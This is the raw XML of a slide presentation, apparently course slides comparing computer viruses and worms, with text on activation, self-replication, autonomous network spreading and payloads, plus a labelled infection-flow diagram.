                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Activation</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN"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7BECC"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Activation</a:t>
                      </a:r>
                      <a:endParaRPr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4C3C"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1152525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Viruses are activated when the infected host program is executed. They can remain dormant until the user runs or opens the infected file.</a:t>
                      </a:r>
                      <a:endParaRPr sz="2200">
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr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F2F5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2200">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Worms are designed to start spreading as soon as they infiltrate a system. They don't require user interaction to execute their code.</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200">
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="zh-CN" altLang="en-US"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DBD8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="冠状病毒"/>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364490" y="1658620"/>
            <a:ext cx="914400" cy="9144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2023.09.21</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Worms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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1132205" y="1301750"/>
            <a:ext cx="9928225" cy="4780280"/>
            <a:chOff x="998510" y="1183843"/>
            <a:chExt cx="9928225" cy="4780280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 215"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="998510" y="1333068"/>
              <a:ext cx="9928225" cy="4631055"/>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9" name="Rectangle 216"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>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1" name="Rectangle 218"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>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3" name="Freeform 219"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>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4" name="Freeform 220"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>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5" name="Freeform 221"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7"/>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6" name="Freeform 222"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>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7" name="Freeform 223"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>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pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="图形 17" descr="templates\docerresourceshop\icons\\32313535373331353b32313535373332313bc8cbb9a4d6c7c4dcbbfac6f7c8cb"/>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9506485" y="4632711"/>
              <a:ext cx="1260000" cy="1260000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7"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3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1132205" y="1837690"/>
            <a:ext cx="9498965" cy="301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gn="just">
              <a:lnSpc>
                <a:spcPts val="3700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId14"/>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mn-ea"/>
              </a:rPr>
              <a:t>Worms are designed to self-replicate and spread independently across computer networks and systems. Unlike viruses, which need a host file or program to attach to, worms operate as standalone programs with the primary goal of infecting as many devices and systems as possible. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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Characteristics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Self-Replication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> Create copies of themselves without requiring a host program. generate multiple instances of their code and distribute these copies to other vulnerable systems.</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Autonomous Spreading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> Spread automatically across networks and devices. exploit vulnerabilities in operating systems or software to gain access to target systems. Once inside, they seek out and infect other vulnerable devices on the same network.</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Characteristics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No User Intervention Required:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> Unlike many other types of malware that rely on user actions (such as opening an infected file or clicking on a link), worms can spread without any user interaction. Their autonomous spreading mechanism makes them highly efficient at propagation.</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Network-Based:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  Spread through computer networks, including the internet. They can rapidly move from one device to another, making them a significant threat to network security.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="38100" indent="0">
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buNone/>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Characteristics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Payload:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> While the primary purpose of worms is to spread, they may also carry a payload, which could be a malicious action such as deleting files, stealing data, or installing a backdoor for remote control. The payload varies depending on the specific worm.</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Widespread Impact:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  Worms can have a significant impact on both individual systems and entire networks. They can overload network resources, slow down system performance, and disrupt normal operations.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="38100" indent="0">
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buNone/>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Example</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Virus Figure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24" name="组合 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="491490" y="1527175"/>
            <a:ext cx="4399915" cy="3342640"/>
            <a:chOff x="1711" y="2465"/>
            <a:chExt cx="6929" cy="5264"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="矩形 15"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId1"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3622" y="2465"/>
              <a:ext cx="5018" cy="5265"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="8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Text Box 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1711" y="2465"/>
              <a:ext cx="1843" cy="628"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Dropper</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="组合 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="5175885" y="1527175"/>
            <a:ext cx="6525260" cy="4701540"/>
            <a:chOff x="8757" y="2425"/>
            <a:chExt cx="10276" cy="7404"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="矩形 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9533" y="2425"/>
              <a:ext cx="5018" cy="5265"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FADBD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圆角矩形 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11975" y="3296"/>
              <a:ext cx="2224" cy="997"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E74C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800" b="1">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Entry</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="圆角矩形 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9534" y="7670"/>
              <a:ext cx="5017" cy="1923"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D7F2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圆角矩形 12"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9534" y="8615"/>
              <a:ext cx="5017" cy="978"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="37BEC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000" b="1">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Return to infected program</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Text Box 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="15283" y="7909"/>
              <a:ext cx="3751" cy="628"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Malicious Payload</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Text Box 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14551" y="2425"/>
              <a:ext cx="3552" cy="628"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Infected program</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="直接连接符 17"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14190" y="3794"/>
              <a:ext cx="1123" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="2">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:srgbClr val="FFFFFF"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:srgbClr val="FFFFFF"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="19" name="直接连接符 18"/>
            <p:cNvCxnSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="15311" y="3789"/>
              <a:ext cx="0" cy="6022"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="2">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:srgbClr val="FFFFFF"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:srgbClr val="FFFFFF"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="直接连接符 19"/>
            <p:cNvCxnSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8773" y="9806"/>
              <a:ext cx="6532" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="2">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:srgbClr val="FFFFFF"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:srgbClr val="FFFFFF"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="21" name="直接连接符 20"/>
            <p:cNvCxnSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8760" y="8223"/>
              <a:ext cx="0" cy="1606"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="2">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:srgbClr val="FFFFFF"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:srgbClr val="FFFFFF"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="直接连接符 21"/>
            <p:cNvCxnSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8757" y="8218"/>
              <a:ext cx="1396" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:tailEnd type="triangle" w="lg" len="lg"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="2">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:srgbClr val="FFFFFF"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:srgbClr val="FFFFFF"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="25" name="直接连接符 24"/>
            <p:cNvCxnSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="14199" y="9104"/>
              <a:ext cx="737"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26" name="直接连接符 25"/>
            <p:cNvCxnSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId11"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14930" y="5411"/>
              <a:ext cx="13" cy="3693"/>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27" name="直接连接符 26"/>
            <p:cNvCxnSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId12"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="13752" y="5411"/>
              <a:ext cx="1191" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:tailEnd type="triangle" w="lg" len="lg"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="2">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:srgbClr val="FFFFFF"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:srgbClr val="FFFFFF"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxn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
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="6"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>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29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UNIT_TABLE_BEAUTIFY" val="smartTable{b7c07c27-9119-4383-a339-984afdfbad5a}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="847*307"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="63*150*847*307"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{52e1d9ef-8848-43e8-9c85-4e52e1e2b03a}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="847*307"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="63*150*847*307"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{9fa216a9-6e7b-486f-aec6-477474317214}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="847*307"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="63*150*847*307"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{059b1a29-2ef2-4a71-b4fc-3ff26104e41c}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="847*307"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="63*150*847*307"/>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339.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiMmY5MzdhMTM4MGYwZjY3MmUyNDAwYWI5ODI4MjA4MzUifQ=="/>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14827</Words>
  <Application>WPS Presentation</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>508</Paragraphs>
  <Slides>33</Slides>
  <Notes>11</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>已用的字体</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>27</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>主题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>42</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>幻灯片标题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>33</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="102" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>SimSun</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
